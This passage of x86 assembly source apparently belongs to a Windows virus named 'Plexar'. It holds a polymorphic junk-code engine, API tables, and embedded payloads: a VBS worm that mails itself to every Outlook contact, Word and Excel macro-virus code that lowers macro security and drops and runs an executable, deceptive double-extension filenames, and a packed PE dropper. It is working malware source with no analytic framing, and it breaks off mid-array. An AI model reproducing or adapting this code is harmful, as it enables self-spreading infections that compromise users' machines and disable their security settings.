+ ADD ESI, EAX + MOVSB + + XOR EBX, EBX + DEC EBX + CALL @Aleatorio + STOSD + JMP @BasuraR + + @B1_Tabla: + DB 0B8h ; MOV EAX + DB 0BBh ; MOV EBX + DB 0BAh ; MOV EDX + DB 0BEh ; MOV ESI + DB 005h ; ADD EAX + DB 02Dh ; SUB EAX + DB 035h ; XOR EAX + DB 015h ; ADC EAX + + @Basura_2: + + PUSH 15d + POP EBX + CALL @Aleatorio + ADD EAX, EAX + LEA ESI, OFS [@B2_Tabla] + ADD ESI, EAX + MOVSW + + XOR EBX, EBX + DEC EBX + CALL @Aleatorio + STOSD + + JMP @BasuraR + + @B2_Tabla: + DB 081h, 0C3h ; ADD EBX + DB 081h, 0C2h ; ADD EDX + DB 081h, 0C6h ; ADD ESI + DB 081h, 0EBh ; SUB EBX + DB 081h, 0EAh ; SUB EDX + DB 081h, 0EEh ; SUB ESI + DB 081h, 0F6h ; XOR ESI + DB 081h, 0F2h ; XOR EDX + DB 081h, 0F3h ; XOR EBX + DB 081h, 0D3h ; ADC EBX + DB 081h, 0D2h ; ADC EDX + DB 081h, 0D6h ; ADC ESI + DB 069h, 0C0h ; IMUL EAX + DB 069h, 0DBh ; IMUL EBX + DB 069h, 0D2h ; IMUL EDX + DB 069h, 0F6h ; IMUL ESI + + @Basura_3: + + PUSH 35d + POP EBX + CALL @Aleatorio + ADD EAX, EAX + LEA ESI, OFS [@B3_Tabla] + ADD ESI, EAX + MOVSW + + JMP @BasuraR + + @B3_Tabla: + DB 001h, 0D8h ; ADD EAX, EBX + DB 001h, 0D0h ; ADD EAX, EDX + DB 001h, 0F0h ; ADD EAX, ESI + DB 001h, 0D3h ; ADD EBX, EDX + DB 001h, 0F3h ; ADD EBX, ESI + DB 001h, 0C3h ; ADD EBX, EAX + DB 001h, 0DAh ; ADD EDX, EBX + DB 001h, 0F2h ; ADD EDX, ESI + DB 001h, 0C2h ; ADD EDX, EAX + DB 001h, 0DEh ; ADD ESI, EBX + DB 001h, 0D6h ; ADD ESI, EDX + DB 001h, 0C6h ; ADD ESI, EAX + DB 029h, 0D8h ; SUB EAX, EBX + DB 029h, 0D0h ; SUB EAX, EDX + DB 029h, 0F0h ; SUB EAX, ESI + DB 029h, 0C3h ; SUB EBX, EAX + DB 029h, 0D3h ; SUB EBX, EDX + DB 029h, 0F3h ; SUB EBX, ESI + DB 029h, 0C2h ; SUB EDX, EAX + DB 029h, 0DAh ; SUB EDX, EBX + DB 029h, 0F2h ; SUB EDX, ESI + DB 029h, 0C6h ; SUB ESI, EAX + DB 029h, 0DEh ; SUB ESI, EBX + DB 029h, 0D6h ; SUB ESI, EDX + DB 031h, 0D8h ; XOR EAX, EBX + DB 031h, 0D0h ; XOR EAX, EDX + DB 031h, 0F0h ; XOR EAX, ESI + DB 031h, 0C3h ; XOR EBX, EAX + DB 031h, 0D3h ; XOR EBX, EDX + DB 031h, 0F3h ; XOR EBX, ESI + DB 031h, 0C2h ; XOR EDX, EAX + DB 031h, 0DAh ; XOR EDX, EBX + DB 031h, 0F2h ; XOR EDX, ESI + DB 031h, 0C6h ; XOR ESI, EAX + DB 031h, 0DEh ; XOR ESI, EBX + DB 031h, 0D6h ; XOR ESI, EDX + + @Basura_4: + MOV AL, 068h ; PUSH + STOSB + XOR EBX, EBX + DEC EBX + CALL @Aleatorio + STOSD + + PUSH 03h + POP EBX + CALL @Aleatorio + LEA ESI, OFS [@B4_Tabla] + ADD ESI, EAX + MOVSB + + JMP @BasuraR + + @B4_Tabla: + DB 058h ; POP EAX + DB 05Bh ; POP EBX + DB 05Ah ; POP EDX + DB 05Eh ; POP ESI + + @Basura_5: + PUSH 11d + POP EBX + CALL @Aleatorio + LEA ESI, OFS [@B5_Tabla] + ADD ESI, EAX + MOVSB + + JMP @BasuraR + + @B5_Tabla: + DB 040h ; inc eax + DB 043h ; inc ebx + DB 042h ; inc edx + DB 046h ; inc esi + DB 048h ; dec eax + DB 04Bh ; dec ebx + DB 04Ah ; dec edx + DB 04Eh ; dec esi + DB 093h ; xchg ebx,eax + DB 092h ; xchg edx,eax + DB 096h ; xchg esi,eax + DB 093h ; xchg ebx,eax + + @Basura_6: + PUSH 13d + POP EBX + CALL @Aleatorio + LEA ESI, OFS [@B6_Tabla] + ADD EAX, EAX + ADD ESI, EAX + MOVSW + + JMP @BasuraR + + @B6_Tabla: + DB 0F7h, 0D0h ; not eax + DB 0F7h, 0D3h ; not ebx + DB 0F7h, 0D2h ; not edx + DB 0F7h, 0D6h ; not esi + DB 0F7h, 0D8h ; neg eax + DB 0F7h, 0DBh ; neg ebx + DB 0F7h, 0DAh ; neg edx + DB 0F7h, 0DEh ; neg esi + DB 087h, 0DAh ; xchg ebx,edx + DB 087h, 0DEh ; xchg ebx,esi + DB 087h, 0D3h ; xchg edx,ebx + DB 087h, 0D6h ; xchg edx,esi + DB 087h, 0F3h ; xchg esi,ebx + DB 087h, 0F2h ; xchg esi,edx + + @Basura_7: + PUSH 31d + POP EBX + CALL @Aleatorio + LEA ESI, OFS [@B7_Tabla] + ADD EAX, EAX + ADD ESI, EAX + MOVSW + XOR EBX, EBX + DEC EBX + CALL @Aleatorio + STOSB + + JMP @BasuraR + + @B7_Tabla: + DB 0C1h, 0D0h ; rcl eax + DB 0C1h, 0D3h ; rcl ebx + DB 0C1h, 0D2h ; rcl edx + DB 0C1h, 0D6h ; rcl esi + DB 0C1h, 0D8h ; rcr eax + DB 0C1h, 0DBh ; rcr ebx + DB 0C1h, 0DAh ; rcr edx + DB 0C1h, 0DEh ; rcr esi + DB 0C1h, 0C0h ; rol eax + DB 0C1h, 0C3h ; rol ebx + DB 0C1h, 0C2h ; rol edx + DB 0C1h, 0C6h ; rol esi + DB 0C1h, 0C8h ; ror eax + DB 0C1h, 0CBh ; ror ebx + DB 0C1h, 0CAh ; ror edx + DB 0C1h, 0CEh ; ror esi + DB 0C1h, 0E0h ; shl eax + DB 0C1h, 0E3h ; shl ebx + DB 0C1h, 0E2h ; shl edx + DB 0C1h, 0E6h ; shl esi + DB 0C1h, 0F8h ; sar eax + DB 0C1h, 0FBh ; sar ebx + DB 0C1h, 0FAh ; sar edx + DB 0C1h, 0FEh ; sar esi + DB 0C1h, 0E0h ; shl eax + DB 0C1h, 0E3h ; shl ebx + DB 0C1h, 0E2h ; shl edx + DB 0C1h, 0E6h ; shl esi + DB 0C1h, 0E8h ; shr eax + DB 0C1h, 0EBh ; shr ebx + DB 0C1h, 0EAh ; shr edx + DB 0C1h, 0EEh ; shr esi + + @SaveSemilla DB 8 DUP (00h) + + Semilla_1 DD 00000000h + Semilla_2 DD 00000000h + Llave DD 00000000h + + Origen DD 00000000h + Destino DD 00000000h + Tamao DD 00000000h + + GuardaDelta DD 00000000h + GuardaDelta2 DD 00000000h + GuardaLoop DD 00000000h + + Mierda_1 EQU 1A7FC23Bh + Mierda_2 EQU 000028B1h + Mierda_3 EQU 974D9DB5h + Mierda_4 EQU 0000F3C9h + + PXPE ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + +;*************************************************************** +;* aPLib v0.22b - the smaller the better :) * +;* WASM & TASM assembler depacker * +;* * +;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved * +;*************************************************************** + +;.386p +;.MODEL flat + +;.CODE + +;PUBLIC _aP_depack_asm + +_aP_depack_asm: + push ebp + mov ebp, esp + pushad + push ebp + + mov esi, [ebp + 8] ; C calling convention + mov edi, [ebp + 12] + + cld + mov dl, 80h + +literal: + movsb +nexttag: + call getbit + jnc literal + + xor ecx, ecx + call getbit + jnc codepair + xor eax, eax + call getbit + jnc shortmatch + mov al, 10h +getmorebits: + call getbit + adc al, al + jnc getmorebits + jnz domatch_with_inc + stosb + jmp short nexttag +codepair: + call getgamma_no_ecx + dec ecx + loop normalcodepair + mov eax,ebp + call getgamma + jmp short domatch + +shortmatch: + lodsb + shr eax, 1 + jz donedepacking + adc ecx, 2 + mov ebp, eax + jmp short domatch + +normalcodepair: + xchg eax, ecx + dec eax + shl eax, 8 + lodsb + mov ebp, eax + call getgamma + cmp eax, 32000 + jae domatch_with_2inc + cmp eax, 1280 + jae domatch_with_inc + cmp eax, 7fh + ja domatch + +domatch_with_2inc: + inc ecx + +domatch_with_inc: + inc ecx +domatch: + push esi + mov esi, edi + sub esi, eax + rep movsb + pop esi + jmp short nexttag + +getbit: + add dl, dl + jnz stillbitsleft + mov dl, [esi] + inc esi + adc dl, dl +stillbitsleft: + ret + +getgamma: + xor ecx, ecx +getgamma_no_ecx: + inc ecx +getgammaloop: + call getbit + adc ecx, ecx + call getbit + jc getgammaloop + ret + +donedepacking: + pop ebp + sub edi, [ebp + 12] + mov [ebp - 4], edi ; return unpacked length in eax + + popad + pop ebp + ret + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Billy Belcebu's CRC32 calculator. + ; + ; CRC32 procedure + ; --------------+ + ; + ; input: + ; ESI = Offset where code to calculate begins + ; EDI = Size of that code + ; output: + ; EAX = CRC32 of given code + ; + + CRC32 proc + cld + xor ecx,ecx ; Optimized by me - 2 bytes + dec ecx ; less + mov edx,ecx + NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 + NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h + NoCRC: dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi ; 1 byte less + jnz NextByteCRC + not edx + not ecx + mov eax,edx + rol eax,16 + mov ax,cx + ret + CRC32 endp + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; Generador de numeros aleatorios para uso general. + ; + ; EBX -> Limite Superior + + Random PROC + + PUSH ECX EDX EDI EBX + + LEA EDI, OFS [Mariconada] + RDTSC + STOSD + PUSH 04h + POP EDI + LEA ESI, OFS [Mariconada] + CALL CRC32 + XCHG EDX, EAX + + PUSH EDX + LEA EDI, OFS [Mariconada] + APICALL GetTickCount + STOSD + SUB EDI, 04h + XCHG EDI, ESI + PUSH 04h + POP EDI + CALL CRC32 + POP EDX + + PUSH EAX + OR EAX, EDX + POP ECX + AND EDX, ECX + + XOR EAX, EDX + + POP EBX + XOR EDX, EDX + DIV EBX + XCHG EDX, EAX + + POP EDI EDX ECX + RET + + Mariconada DB 9 DUP (00h) + + Random ENDP + +; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 + + ; TABLA! + ; + ; Create -> 01h + ; File -> 02h + ; Map -> 03h + ; View -> 04h + ; Close -> 05h + ; Get -> 06h + ; Set -> 07h + ; Find -> 08h + ; Virtual -> 09h + ; Window -> 0Ah + ; Directory -> 0Bh + ; Current -> 0Ch + ; WaitFor -> 0Dh + ; Thread -> 0Eh + + HThread DD 00000000h + + APIs_K32 DB 01h, 02h, "A", 00h + DB 01h, 02h, 03h, "pingA", 00h + DB 03h, 04h, "Of", 02h, 00h + DB "Unmap", 04h, "Of", 02h, 00h + DB 05h, "Handle", 00h + DB 06h, 02h, "Size", 00h + DB 07h, 02h, "Pointer", 00h + DB 07h, "EndOf", 02h, 00h + DB 07h, 02h, "AttributesA", 00h + DB "Write", 02h, 00h + DB 08h, "First", 02h, "A", 00h + DB 08h, "Next", 02h, "A", 00h + DB 08h, 05h, 00h + DB 09h, "Alloc", 00h + DB 09h, "Free", 00h + DB 06h, 0Ah, "s", 0Bh, "A", 00h + DB 06h, 0Ch, 0Bh, "A", 00h + DB 07h, 0Ch, 0Bh, "A", 00h + DB 01h, 0Eh, 00h + DB "Exit", 0Eh, 00h + DB 0Dh, "MultipleObjects", 00h + DB 0Dh, "SingleObject", 00h + DB 06h, "TickCount", 00h + DB "LoadLibraryA", 00h + DB "Delete", 02h, "A", 00h + DB 07h, 0Eh, "Priority", 00h + DB 0FFh + + CreateFileA DD 00000000h + CreateFileMappingA DD 00000000h + MapViewOfFile DD 00000000h + UnmapViewOfFile DD 00000000h + CloseHandle DD 00000000h + GetFileSize DD 00000000h + SetFilePointer DD 00000000h + SetEndOfFile DD 00000000h + SetFileAttributesA DD 00000000h + WriteFile DD 00000000h + FindFirstFileA DD 00000000h + FindNextFileA DD 00000000h + FindClose DD 00000000h + VirtualAlloc DD 00000000h + VirtualFree DD 00000000h + GetWindowsDirectoryA DD 00000000h + GetCurrentDirectoryA DD 00000000h + SetCurrentDirectoryA DD 00000000h + CreateThread DD 00000000h + ExitThread DD 00000000h + WaitForMultipleObjects DD 00000000h + WaitForSingleObject DD 00000000h + GetTickCount DD 00000000h + LoadLibraryA DD 00000000h + DeleteFileA DD 00000000h + SetThreadPriority DD 00000000h + + KERNEL32 DD 00000000h + + Thread_Directa DD 00000000h + Thread_WormVBS DD 00000000h + Thread_IWord DD 00000000h + Thread_Host DD 00000000h + + Listo_Directa DB 00h + + GetProcAddress DD 00000000h + Exports DD 00000000h + + CRC32_GetProcAddress EQU 0FFC97C1Fh + l_GetProcAddress EQU 0Fh + + Scriptum DD 00000000h + GuardaNom DD 00000000h + LargoVBS DB 00h + FHandle_WVBS DD 00000000h + MHandle_WVBS DD 00000000h + BaseMap_WVBS DD 00000000h + + Gusano_VBS LABEL NEAR + DB 'On Error Resume Next', 0Dh, 0Ah + DB 'Set Outlook = CreateObject("OutLook.Application")', 0Dh, 0Ah + DB 'If ( Outlook <> "" ) Then', 0Dh, 0Ah + DB 'With Outlook', 0Dh, 0Ah + DB 'Set MAPI = .GetNameSpace("MAPI")', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'With MAPI', 0Dh, 0Ah + DB 'Set AddrList = .AddressLists', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'For I = 1 to AddrList.Count', 0Dh, 0Ah + DB 'With OutLook', 0Dh, 0Ah + DB 'Set NuevoMail = .CreateItem(0)', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'Set LibroActual = AddrList.Item(I)', 0Dh, 0Ah + DB 'With NuevoMail', 0Dh, 0Ah + DB '.Attachments.Add "' + L_Gusano_VBS EQU $-Gusano_VBS + + Gusano_VBS2 LABEL NEAR + DB '"', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'Set Yuca = LibroActual.AddressEntries', 0Dh, 0Ah + DB 'With Yuca', 0Dh, 0Ah + DB 'For J = 1 to .Count', 0Dh, 0Ah + DB 'With NuevoMail', 0Dh, 0Ah + DB 'Set bajo = .Recipients', 0Dh, 0Ah + DB 'bajo.Add Yuca(J)', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'Next', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'With NuevoMail', 0Dh, 0Ah + DB '.Send', 0Dh, 0Ah + DB 'End With', 0Dh, 0Ah + DB 'Next', 0Dh, 0Ah + DB 'Outlook.Quit', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + L_Gusano_VBS2 EQU $-Gusano_VBS2 + + Nombres_Varios DB "XD", 00h + DB "Sex.jpg", 20d DUP (" "), ".exe", 00h + DB "Porno.gif", 20d DUP (" "), ".exe", 00h + DB "Free_XXX.jpg", 20d DUP (" "), ".exe", 00h + DB "Great_Music.mp3", 20d DUP (" "), ".exe", 00h + DB "Check_This.jpg", 20d DUP (" "), ".exe", 00h + DB "Cool_Pics.gif", 20d DUP (" "), ".exe", 00h + DB "Love_Story.html", 20d DUP (" "), ".exe", 00h + DB "Sexy_Screensaver.scr", 00h + DB "Free_Love_Screensaver.scr", 00h + DB "Eat_My_Shorts.scr", 00h + + Raxelp_vbs DB "raxelp.vbs", 00h + WScript_exe DB "wscript.exe", 00h + + Tabla_Hex DB "0123456789ABCDEF", 00h + + FHandle_IW DD 00000000h + MHandle_IW DD 00000000h + BaseMap_IW DD 00000000h + Tamao_IW DD 00000000h + Memoria_IW DD 00000000h + Macaco DB 13d DUP (00h) + + Virus_Macro LABEL NEAR + DB 'Attribute VB_Name = "Plexar"', 0Dh, 0Ah + DB 'Sub Auto_Open()', 0Dh, 0Ah + DB 'Application.OnSheetActivate = "InfXL"', 0Dh, 0Ah + DB 'End Sub', 0Dh, 0Ah + DB 'Sub InfXL()', 0Dh, 0Ah + DB 'On Error Resume Next', 0Dh, 0Ah + DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah + DB 'Set VBP = Application.VBE.ActiveVBProject', 0Dh, 0Ah + DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah + DB 'Set VBX = VBP.VBComponents', 0Dh, 0Ah + DB 'With Application: .ScreenUpdating = Not -1: .DisplayStatusBar = Not -1: .EnableCancelKey = Not -1: .DisplayAlerts = Not -1: End With', 0Dh, 0Ah + DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$": YYY = Application.StartupPath & "\personal.xls"', 0Dh, 0Ah + DB 'VBX.Item(ZZZ).Export XXX', 0Dh, 0Ah + DB 'If AXO.Item(ZZZ).Name <> ZZZ Then', 0Dh, 0Ah + DB ' AXO.Import XXX: AWO.SaveAs AWO.FullName', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'If (Dir(YYY) = "") Then', 0Dh, 0Ah + DB 'Workbooks.Add.SaveAs YYY', 0Dh, 0Ah + DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah + DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah + DB 'AXO.Import XXX', 0Dh, 0Ah + DB 'ActiveWindow.Visible = Not -1', 0Dh, 0Ah + DB 'Workbooks("personal.xls").Save', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'Kill XXX', 0Dh, 0Ah + DB 'Call Correme', 0Dh, 0Ah + DB 'End Sub', 0Dh, 0Ah + DB 'Sub AutoClose()', 0Dh, 0Ah + DB 'On Error Resume Next', 0Dh, 0Ah + DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$"', 0Dh, 0Ah + DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah + DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah + DB 'With Options: .VirusProtection = (2 * 4 + 4 / 6 - 2): .ConfirmConversions = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah + DB 'With Application: .DisplayStatusBar = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah + DB 'Set AKT = VBE.ActiveVBProject.VBComponents', 0Dh, 0Ah + DB 'Set NOX = NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah + DB 'Set DOX = ActiveDocument.VBProject.VBComponents', 0Dh, 0Ah + DB 'AKT.Item(ZZZ).Export XXX', 0Dh, 0Ah + DB 'If (NOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah + DB 'NOX.Import XXX', 0Dh, 0Ah + DB 'NormalTemplate.Save', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'If (DOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah + DB 'DOX.Import XXX', 0Dh, 0Ah + DB 'ActiveDocument.SaveAs ActiveDocument.FullName', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'Kill XXX', 0Dh, 0Ah + DB 'Call Correme', 0Dh, 0Ah + DB 'End Sub', 0Dh, 0Ah + DB 'Private Sub Correme()', 0Dh, 0Ah + DB 'On Error Resume Next', 0Dh, 0Ah + DB 'Dim joda as String', 0Dh, 0Ah + DB 'Dim X as String', 0Dh, 0Ah + DB 'joda = "' + L_Virus_Macro EQU $-Virus_Macro + + Virus_Macro_2 LABEL NEAR + DB 'For o = 1 to Len(joda) Step 2', 0Dh, 0Ah + DB 'X = X + Chr("&h" + Mid(Joda, o, 2))', 0Dh, 0Ah + DB 'Next', 0Dh, 0Ah + DB 'raxname = Environ("windir") & "\raxelp.exe"', 0Dh, 0Ah + DB 'Open raxname For Binary As #1', 0Dh, 0Ah + DB 'Put #1, 1, X$', 0Dh, 0Ah + DB 'Close #1', 0Dh, 0Ah + DB 'xoxo = Shell(raxname, 0)', 0Dh, 0Ah + DB 'End Sub', 0Dh, 0Ah + L_Virus_Macro_2 EQU $-Virus_Macro_2 + + Nihil DB 00h + Memoria DD 00000000h + Raxelp_$$$ DB "c:\raxelp.$$$", 00h + Plxwrd_vbs DB "plxwrd.vbs", 00h + + Macro_VBS LABEL NEAR + DB 'On Error Resume Next', 0Dh, 0Ah + DB 'Set word = CreateObject("Word.Application")', 0Dh, 0Ah + DB 'If ( word <> "" ) Then', 0Dh, 0Ah + DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah + DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah + DB 'Set maca = word.Application.NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah + DB 'If maca.Item("Plexar").Name <> "Plexar" Then', 0Dh, 0Ah + DB 'maca.Import "c:\raxelp.$$$"', 0Dh, 0Ah + DB 'word.Application.NormalTemplate.Save', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'Set fso = CreateObject("Scripting.FileSystemObject")', 0Dh, 0Ah + DB 'Set excel = CreateObject("Excel.Application")', 0Dh, 0Ah + DB 'If ( excel <> "" ) Then', 0Dh, 0Ah + DB 'yyy = excel.Application.StartupPath & "\personal.xls"', 0Dh, 0Ah + DB 'If (fso.FileExists(yyy) = False) Then', 0Dh, 0Ah + DB 'excel.WorkBooks.Add.SaveAs yyy', 0Dh, 0Ah + DB 'excel.Application.ActiveWorkbook.VBProject.VBComponents.Import "c:\raxelp.$$$"', 0Dh, 0Ah + DB 'excel.ActiveWindow.Visible = Not -1', 0Dh, 0Ah + DB 'excel.Workbooks("personal.xls").Save', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + DB 'excel.Application.Quit', 0Dh, 0Ah + DB 'End If', 0Dh, 0Ah + Largo_MVBS EQU $-Macro_VBS + + FHandle_DPE DD 00000000h + MHandle_DPE DD 00000000h + BaseMap_DPE DD 00000000h + + DROPPER LABEL NEAR + + DB 04Dh, 038h, 05Ah, 050h, 038h, 002h, 067h, 002h + DB 004h, 007h, 00Fh, 007h, 0FFh, 01Ch, 010h, 0B8h + DB 0E1h, 048h, 001h, 040h, 0E0h, 01Ah, 0E1h, 00Ah + DB 0B3h, 001h, 01Ch, 006h, 0BAh, 010h, 000h, 00Eh + DB 01Fh, 0B4h, 009h, 0CDh, 021h, 07Dh, 0B8h, 067h + DB 04Ch, 00Ah, 090h, 010h, 054h, 068h, 069h, 073h + DB 007h, 020h, 070h, 072h, 06Fh, 067h, 033h, 061h + DB 06Dh, 0C7h, 027h, 075h, 0C7h, 074h, 0D3h, 062h + DB 065h, 0C7h, 0FFh, 00Fh, 06Eh, 099h, 006h, 064h + DB 0E7h, 0C7h, 0D3h, 057h, 069h, 0D0h, 033h, 032h + DB 00Dh, 01Ch, 00Ah, 024h, 037h, 029h, 001h, 057h + DB 063h, 050h, 045h, 00Eh, 008h, 04Ch, 001h, 005h + DB 001h, 099h, 02Bh, 05Ch, 0A3h, 058h, 014h, 0E0h + DB 0E0h, 08Eh, 004h, 081h, 00Bh, 001h, 002h, 019h + DB 08Dh, 019h, 022h, 007h, 08Ah, 010h, 004h, 064h + DB 020h, 099h, 01Eh, 056h, 00Ch, 041h, 053h, 001h + DB 01Fh, 038h, 003h, 029h, 00Ah, 009h, 012h, 070h + DB 036h, 04Dh, 002h, 0A4h, 01Fh, 0A4h, 035h, 053h + DB 020h, 008h, 07Bh, 0A5h, 04Bh, 02Bh, 001h, 0B2h + DB 097h, 0A2h, 02Eh, 00Ah, 060h, 038h, 052h, 0BCh + DB 0A1h, 0D4h, 061h, 0F8h, 0EBh, 0C1h, 043h, 04Fh + DB 044h, 045h, 05Bh, 0D8h, 022h, 002h, 056h, 006h + DB 024h, 095h, 0B7h, 007h, 0E0h, 044h, 041h, 054h + DB 02Ah, 00Dh, 0CAh, 004h, 091h, 012h, 035h, 008h + DB 050h, 07Ch, 0C3h, 0C0h, 007h, 02Eh, 069h, 064h + DB 061h, 074h, 02Ah, 04Ch, 06Dh, 023h, 026h, 03Ch + DB 0D4h, 028h, 0E0h, 072h, 065h, 06Ch, 023h, 06Fh + DB 063h, 091h, 050h, 0C8h, 01Ch, 056h, 040h, 050h + DB 073h, 0E4h, 063h, 0E1h, 01Dh, 022h, 01Ch, 08Ah + DB 01Eh, 028h, 054h, 0E1h, 05Ah, 001h, 0FFh, 0B0h + DB 033h, 0C0h, 050h, 084h, 030h, 0E8h, 01Dh, 019h + DB 068h, 088h, 013h, 0DEh, 00Ah, 099h, 007h, 015h + DB 06Ah, 091h, 00Eh, 006h, 007h, 0FFh, 025h, 050h + DB 040h, 01Ch, 00Dh, 054h, 086h, 045h, 05Ch, 04Bh + DB 001h, 0FEh, 0BFh, 0C9h, 03Ch, 0F1h, 0D4h, 0C6h + DB 064h, 019h, 065h, 050h, 009h, 048h, 02Ch, 014h + DB 071h, 089h, 05Ch, 03Eh, 03Eh, 0F8h, 033h, 07Ch + DB 031h, 084h, 0A4h, 063h, 092h, 0E5h, 06Ah, 014h + DB 007h, 04Bh, 045h, 052h, 04Eh, 030h, 04Ch, 033h + DB 032h, 02Eh, 038h, 064h, 06Ch, 0F0h, 035h, 055h + DB 053h, 01Ch, 036h, 00Bh, 002h, 0F9h, 0D9h, 065h + DB 0C6h, 0F4h, 031h, 080h, 045h, 078h, 069h, 074h + DB 050h, 072h, 03Fh, 06Fh, 063h, 038h, 073h, 0EFh + DB 01Dh, 058h, 02Ah, 06Bh, 04Dh, 0C7h, 017h, 061h + DB 067h, 094h, 041h, 0CFh, 001h, 0AAh, 0D7h, 0B6h + DB 097h, 00Eh, 01Fh, 030h, 025h, 04Eh, 02Bh, 097h + DB 07Fh, 004h, 0BEh, 004h, 0B2h, 02Fh, 07Ah, 03Bh + DB 063h, 002h, 083h, 003h, 05Fh, 00Dh, 081h, 0E7h + DB 080h, 00Eh, 091h, 011h, 038h, 056h, 020h, 08Bh + DB 001h, 0F9h, 0F0h, 015h, 050h, 018h, 0B5h, 008h + DB 014h, 0A0h, 094h, 068h, 030h, 0ACh, 00Ah, 0BFh + DB 08Ah, 02Ch, 015h, 029h, 018h, 071h, 090h, 011h + DB 0B4h, 060h, 001h, 0E8h, 002h, 04Eh, 08Ch, 02Fh + DB 09Ch, 0C1h, 0F5h, 014h, 04Fh, 09Ch, 038h, 009h + DB 038h, 049h, 032h, 044h, 009h, 05Fh, 027h, 043h + DB 007h, 04Fh, 007h, 04Eh, 007h, 031h, 005h, 028h + DB 067h, 0A4h, 005h, 040h, 04Ah, 04Ah, 004h, 028h + DB 08Ah, 080h, 002h, 0DEh, 0D4h, 056h, 080h, 081h + DB 077h, 0F1h, 049h, 007h, 046h, 002h, 013h, 06Dh + DB 0C0h, 002h, 010h, 047h, 009h, 005h, 0FFh, 05Ch + DB 003h, 03Bh, 0F8h, 0A4h, 007h, 0A2h, 002h, 08Ch + DB 013h, 00Bh, 0AAh, 0C3h, 003h, 007h, 077h, 087h + DB 097h, 036h, 078h, 009h, 063h, 00Ah, 018h, 0A2h + DB 022h, 03Fh, 002h, 020h, 046h, 03Ch, 070h, 0FDh + DB 033h, 00Ah, 0A2h, 04Bh, 0F0h, 086h, 016h, 0A1h + DB 010h, 08Fh, 0E5h, 00Fh, 0C2h, 013h, 00Dh, 022h + DB 007h, 088h, 008h, 05Fh, 0AAh, 09Bh, 010h, 06Fh + DB 00Fh, 010h, 0ADh, 007h, 041h, 0C3h, 01Bh, 03Eh + DB 020h, 0A2h, 01Dh, 072h, 04Eh, 0A4h, 040h, 0E1h + DB 046h, 020h, 07Ch, 0DCh, 004h, 029h, 010h, 06Eh + DB 039h, 04Fh, 008h, 09Ch, 0DEh, 088h, 06Bh, 010h + DB 033h, 03Fh, 008h, 0F5h, 00Ah, 001h, 077h, 010h + DB 0EDh, 01Bh, 094h, 00Bh, 087h, 020h, 0B1h, 080h + DB 011h, 0C5h, 010h, 0A9h, 00Ah, 020h, 01Bh, 001h + DB 016h, 087h, 04Ch, 021h, 008h, 08Eh, 03Eh, 019h + DB 099h, 0FFh, 0E7h, 0D3h, 02Ah, 00Bh, 010h, 010h + DB 06Fh, 009h, 016h, 02Ch, 019h, 021h, 091h, 08Ch + DB 06Eh, 0F0h, 014h, 08Fh, 080h, 0F4h, 001h, 019h + DB 011h, 018h, 092h, 0A2h, 09Dh, 03Fh, 09Fh, 01Dh + DB 070h, 0A8h, 010h, 06Eh, 090h, 0CAh, 054h, 010h + DB 07Fh, 089h, 0F9h, 008h, 080h, 0A3h, 0D6h, 07Ah + DB 020h, 086h, 0EFh, 00Dh, 045h, 093h, 022h, 010h + DB 0F0h, 00Dh, 043h, 0A8h, 09Ch, 010h, 0DBh, 062h + DB 021h, 0C5h, 019h, 021h, 09Ch, 087h, 056h, 010h + DB 0A0h, 071h, 007h, 069h, 07Fh, 042h, 009h, 0EBh + DB 02Ah, 014h, 0F0h, 04Fh, 05Fh, 028h, 0CAh, 0F5h + DB 020h, 005h, 090h, 014h, 008h, 099h, 